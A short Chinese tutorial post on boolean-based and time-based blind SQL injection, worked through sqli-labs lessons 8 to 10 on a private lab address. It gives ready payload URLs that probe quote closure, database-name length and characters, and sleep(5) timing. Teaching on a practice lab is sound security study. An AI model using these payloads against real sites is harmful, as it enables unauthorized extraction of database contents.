小课堂 -- 时间​​盲注和Bool盲注

简介: 小课堂 -- 时间​​盲注和Bool盲注

环境sqli-labs

 

less 8

一、通过判断是单引号闭合

http://192.168.1.119/sqli/Less-8/?id=1' --+

二、我们查询一下数据库有多少字节

http://192.168.1.119/sqli/Less-8/?id=1' and LENGTH(database())>=8 --+

三、判断数据库的第一个和第二个字母是s、e(ascii码是115,101)

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>=115 --+

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))>=101 --+

 

Less 9

因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

Less 10

同上,只是由单引号变为双引号

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-10/?id=1” and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

禁止非法,后果自负

目录
相关文章
|
8月前
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
50 0
|
8月前
|
数据库
小课堂 -- 绕过去除注释符(Get)
小课堂 -- 绕过去除注释符(Get)
41 0
|
8月前
|
运维 大数据 Shell
时间命令date,你真的会用了吗?
时间命令date,你真的会用了吗?
117 0
|
4月前
|
Linux Docker 容器
10-24|如果我这两个都配置了privileged:true我后边加的这个管用吗
10-24|如果我这两个都配置了privileged:true我后边加的这个管用吗
|
8月前
|
数据库
基于时间盲注
基于时间盲注
57 2
|
8月前
|
数据库
小课堂 -- 延时布尔盲注(Post)
小课堂 -- 延时布尔盲注(Post)
46 0
|
8月前
|
SQL 前端开发 Java
SQL注入天书笔记(1)布尔盲注
SQL注入天书笔记(1)布尔盲注
89 0
|
C语言
透过猜数字的小游戏来重新认识和学习随机数(rand())和时间函数(time(NULL))
透过猜数字的小游戏来重新认识和学习随机数(rand())和时间函数(time(NULL))
|
API Python
32.从入门到精通:Python错误输出重定向和程序终止 字符串正则匹配 访问 互联网 日期和时间
32.从入门到精通:Python错误输出重定向和程序终止 字符串正则匹配 访问 互联网 日期和时间
|
XML SQL 安全
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin (xpath盲注)
189 0